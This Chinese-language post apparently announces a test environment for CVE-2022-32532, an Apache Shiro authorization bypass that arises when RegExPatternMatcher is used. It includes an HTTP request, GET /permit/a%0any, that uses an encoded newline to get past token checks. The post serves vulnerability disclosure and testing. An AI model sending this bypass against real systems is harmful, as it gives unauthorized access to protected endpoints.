【CVE-2022-32532】Shiro漏洞测试环境

作者:Sec-Labs | 发布时间:

关于

这是一个演示项目,它只显示了利用这个漏洞(CVE-2022-32532)的其中一个条件。

事实上,有更多的方法可以利用它,只要开发者使用RegExPatternMatcher,就会有可能绕过漏洞。

国家安全漏洞库暂未收录该漏洞(2022-06-29 11点45分)

介绍

在当前配置下,需要进行令牌请求头验证,否则你没有权限访问/permit下的接口。

可以成功请求

GET /permit/any HTTP/1.1
Token: 4ra1n

当没有令牌请求头时,不允许访问

GET /permit/any HTTP/1.1

在特殊但常见的配置中,它可以以简单的方式被绕过

GET /permit/a%0any HTTP/1.1

项目地址

https://github.com/4ra1n/CVE-2022-32532

参考

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

该漏洞类似于Spring-Security CVE-2022-22978

感谢bdemers(Apache Shiro PMC)和chybeta(安全研究员)。

标签:漏洞分享, POC脚本